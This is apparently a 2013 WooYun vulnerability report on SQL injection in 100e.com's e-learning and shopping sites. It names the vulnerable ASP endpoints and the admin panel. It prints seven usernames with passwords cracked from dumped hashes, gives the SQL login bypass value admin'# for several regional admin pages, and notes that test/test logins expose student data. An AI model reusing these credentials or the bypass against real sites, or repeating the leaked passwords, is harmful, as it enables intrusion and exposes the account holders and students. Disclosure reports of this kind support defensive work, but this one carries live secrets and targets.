100e一百易多处SQL注射漏洞,可拖库,可入后台(已证明)

编号25804
Urlhttp://www.wooyun.org/bug.php?action=view&id=25804
漏洞状态厂商已经确认
漏洞标题100e一百易多处SQL注射漏洞,可拖库,可入后台(已证明)
漏洞类型SQL注射漏洞
厂商100e.com
白帽子roofsec
提交日期2013-06-13 15:35:00
公开日期2013-07-28 15:36:00
修复时间(not set)
确认时间2013-06-14 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank18
厂商评级
厂商评rank16
漏洞简介
100e一百易又是注射
漏洞细节

http://elearning.100e.com/lvword/ApplyAdd.asp
http://elearning.100e.com/lvword/ApplyDel.asp
http://elearning.100e.com/lvword/ApplyDel_NoCloseWinDow.asp
http://en.100e.com/buy/chklgn.asp
http://en.100e.com/global/chklgn.asp
上面5个文件存在POST注入漏洞
http://en.100e.com/buy/VerifyName.asp?MemberName=1 存在sql注入漏洞

1.jpg


2.jpg


以下是md5.com.cn解密得到的:
liujuan | 360mianfei
guojunfei | 3241988
symen | 780906
malei | malei888
0001 | kefu001
gaoying | gy5669050
zhushuhua | 800512
(公开这些密码不是说什么泄露 而是这个站经常被注入 这些密码如果不常换的话 也是很危险的)
后台路人皆知了 http://admin.100e.com/admin

3.jpg


指定sql命令

4.jpg


貌似是站库分离 好吧 到此结束 附上一些弱口令
http://gs.city.100e.com/admin/index.html
http://tj.city.100e.com/admin/index.html
http://fujian.city.100e.com/admin/index.html
http://zj.city.100e.com/admin/index.html
http://sx.city.100e.com/admin/index.html
http://gs.city.100e.com/admin/index.html
http://hebei.city.100e.com/admin/index.html
http://js.city.100e.com/admin/index.html
//直接admin'# 密码任意 可直接登录 地区订购信息会被泄露
http://xyz.edudemo.100e.com/
//test test 进去了 泄露大量学生信息
http://demo.edu.100e.com/
//test test 被无数弹框 貌似是一个测试账户 全站都通用

POC

详细说明就是了

修复方案

一个注入 整个站都挂了 貌似数据库设计得不合理啊
信息好像都装在一个库里 还有就是权限设置有点大了
如果不是坑爹的不按常理出牌Asp(asp.net)+MySQL
这个站可能会被get无数shell
最后问一句 整网站的是临时工么?

状态信息 2013-06-13: 细节已通知厂商并且等待厂商处理中
2013-06-14: 厂商已经确认,细节仅向厂商公开
2013-06-24: 细节向核心白帽子及相关领域专家公开
2013-07-04: 细节向普通白帽子公开
2013-07-14: 细节向实习白帽子公开
2013-07-28: 细节向公众公开
厂商回复漏洞正在逐个修复,谢谢!
回应信息危害等级:高漏洞Rank:16 确认时间:2013-06-14 10:14